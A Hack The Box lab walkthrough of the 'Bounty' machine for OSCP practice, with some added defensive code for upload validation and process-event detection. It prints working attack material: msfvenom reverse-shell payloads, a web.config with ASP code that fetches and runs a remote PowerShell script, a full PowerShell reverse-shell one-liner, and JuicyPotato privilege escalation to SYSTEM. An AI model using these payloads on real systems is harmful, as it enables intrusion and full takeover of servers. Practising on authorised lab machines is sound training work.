Hack The Box — Bounty— without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
6 min read · Jun 18, 2023


[image: bounty.htb]

This is my 30th write-up, this time for Bounty, a machine from TJNull’s list of HackTheBox machines for OSCP practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases involved.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let’s run an nmap scan on default ports to see what services are running on the target system.

nmap -sC -sV -O -Pn -oA nmap/initial bounty.htb
[screenshot: nmap output]

From the results, we can see that IIS 7.5 is running on port 80. Let’s see what we have there.

[screenshot: http server]

Just an image, and nothing interesting in the page source either. Let’s try directory busting and see if it reveals anything.

gobuster dir -u http://bounty.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x asp,aspx,db,jsp,html,log,txt -t 200 -k --no-error
[screenshot: gobuster output]

So we have transfer.aspx and an uploadedfiles directory.

Let’s see what we have on transfer.aspx.

[screenshot: /transfer.aspx]

An upload page. Interesting! Now let’s see what we have in the uploadedfiles directory.

[screenshot: /uploadedfiles/]

And we don’t have access to it. Let’s try uploading an image via transfer.aspx and see if we can access it here.

[screenshot: file upload form]

I am simply uploading a PNG image of a dog.

[screenshot: file uploaded]

It says “File uploaded successfully.” Let’s see if we can access it from the uploadedfiles directory.

[screenshot: /uploadedfiles/dog.png]

Initial Foothold

Let’s upload an aspx shell and get a reverse shell back to our system.

First, create an aspx shell using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=4242 -f aspx > shell.aspx

Let’s try uploading it.

[screenshot: invalid file upload]

It gives an error “Invalid File. Please try again”.

This means we are not allowed to upload aspx files. Let’s see what files we are allowed to upload. After some trial and error, we can see that .config files are accepted as well.

Going through this article:

We learn that a web.config file can execute code. Let’s craft a web.config file with the sample code below, and put in code that downloads and executes a PowerShell script that we will be hosting on our own HTTP server.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.16.5:80/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

By uploading it and then accessing it, we should get a reverse shell back to our system. First, let’s get a PowerShell reverse shell and host it. I am going to use the following PowerShell script.

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Now host it on our Python HTTP server.

python3 -m http.server 80

Let’s start a listener on port 4242 and upload the web.config file.

[screenshot: web.config uploaded]

The upload is successful. Let’s see if it works by navigating to it under uploadedfiles.

And we got a shell as merlin.
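As an added example (not code from the original write-up or from the box), here is the kind of deny-list extension check that lets a .config upload through, beside an allow-list check that rejects it; the extension sets and function names are my assumptions.

```python
# Added example, not code from the write-up or from the box: a deny-list
# extension check that behaves like the upload form appears to (blocks .aspx,
# lets .config through), next to an allow-list check that closes the gap.
# The extension sets and the helper names are assumptions for illustration.
import os
import re

# Deny-list: anything not explicitly blocked is accepted. IIS reads a
# web.config from any directory it serves, so letting .config through means
# an upload can reconfigure the upload directory, including enabling code
# execution there.
BLOCKED_EXTENSIONS = {".asp", ".aspx", ".exe", ".php"}

def denylist_allows(filename: str) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED_EXTENSIONS

# Allow-list: only the image types the form is meant to take, only the final
# extension counts, path components are stripped, and the stem is restricted
# to a safe character set so double extensions such as shell.aspx.png fail.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")

def allowlist_allows(filename: str) -> bool:
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    return SAFE_STEM.fullmatch(stem) is not None
```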

Privilege Escalation

Let’s check what privileges we have.

whoami /priv

We have SeImpersonatePrivilege enabled, which means the JuicyPotato exploit may work.

Let’s grab JuicyPotato.exe from GitHub.

Let’s host the exploit on our own SMB server, since file uploading is a pain on this box and we cannot upload an exe either.

If you have Impacket installed, you can copy the smbserver.py script to the current working directory.

locate smbserver.py
cp /usr/share/doc/python3-impacket/examples/smbserver.py .
[screenshot: getting smbserver.py from Impacket]

Let’s put JuicyPotato.exe in the current directory as well, and use the Python smbserver to host it.

python3 smbserver.py DaemonExala /root/TJNull/Windows/Bounty

Here, DaemonExala is the name of the share I am creating (you can name it anything you want), and the directory after it is the current working directory on my attacking machine that has JuicyPotato.exe in it.

[screenshot: smbserver running]

Now that we have SMB running, let’s execute JuicyPotato.exe from our target.

\\10.10.16.5\DaemonExala\JuicyPotato.exe
[screenshot: JuicyPotato parameters]

It gives an error saying there are 3 mandatory arguments we must provide.

  • -t, the process creation mode: we will use *, which tries both CreateProcessWithToken and CreateProcessAsUser.
  • -p, the program to launch: we will create a new Windows shell using msfvenom, upload it to our target, and execute that.
  • -l, the server listen port: the port the COM server communicates on. In our case it doesn’t really matter which port we choose, since we are uploading an msfvenom-generated shell explicitly and executing it via JuicyPotato.

Let’s create a shell.exe using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=8080 -f exe > shell.exe

Let’s start a Python HTTP server and download it to our target using the PowerShell reverse shell we already have.

#(on attacking machine)
python3 -m http.server 80

#(on target machine)
(new-object net.webclient).downloadfile('http://10.10.16.5:80/shell.exe', 'C:\Users\merlin\shell.exe')
[screenshot: python http server running]
[screenshot: uploaded shell.exe]

We got the shell.exe on the target.

Let’s start a listener to catch the shell we created using msfvenom, and run JuicyPotato again via our smbserver with the appropriate arguments.

\\10.10.16.5\DaemonExala\JuicyPotato.exe -t * -p shell.exe -l 4444
[screenshot: whoami shows nt authority\system]

And we got a System Shell!
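From the defender’s side, the chain above leaves two process-creation patterns that are easy to alert on. As an added example (not part of the original write-up), here is a small detector over constructed Sysmon-style process events; the field names, the sample chain and the rule names are my assumptions.

```python
# Added example, not from the write-up: flag the two stages of the chain in
# process-creation telemetry. Field names and sample events are constructed.
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    user: str           # account the new process runs as
    parent_pid: int
    parent_image: str

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SERVICE_USERS = {"nt authority\\system", "nt authority\\local service",
                 "nt authority\\network service"}

def _name(path: str) -> str:
    """Return the lower-cased file name of a Windows (or UNC) path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for events matching either stage."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        # Stage 1: the IIS worker process spawning a shell, which is what the
        # ASP code inside the uploaded web.config does.
        if _name(e.parent_image) == "w3wp.exe" and _name(e.image) in SHELLS:
            alerts.append(("iis_spawned_shell", e.pid))
        # Stage 2: a SYSTEM child whose parent runs as an ordinary user, the
        # shape left by token-impersonation tools such as JuicyPotato.
        parent = by_pid.get(e.parent_pid)
        if (parent is not None and e.user.lower() in SERVICE_USERS
                and parent.user.lower() not in SERVICE_USERS):
            alerts.append(("privilege_jump", e.pid))
    return alerts

# Constructed sample chain (not real telemetry): w3wp -> cmd -> powershell ->
# JuicyPotato (run from the SMB share) -> shell.exe running as SYSTEM.
SAMPLE = [
    ProcEvent(100, r"C:\Windows\System32\inetsrv\w3wp.exe", r"BOUNTY\merlin", 50, r"C:\Windows\System32\svchost.exe"),
    ProcEvent(200, r"C:\Windows\System32\cmd.exe", r"BOUNTY\merlin", 100, r"C:\Windows\System32\inetsrv\w3wp.exe"),
    ProcEvent(300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"BOUNTY\merlin", 200, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(400, r"\\10.10.16.5\DaemonExala\JuicyPotato.exe", r"BOUNTY\merlin", 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(500, r"C:\Users\merlin\shell.exe", r"NT AUTHORITY\SYSTEM", 400, r"\\10.10.16.5\DaemonExala\JuicyPotato.exe"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"{rule}: pid {pid}")
```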

;)
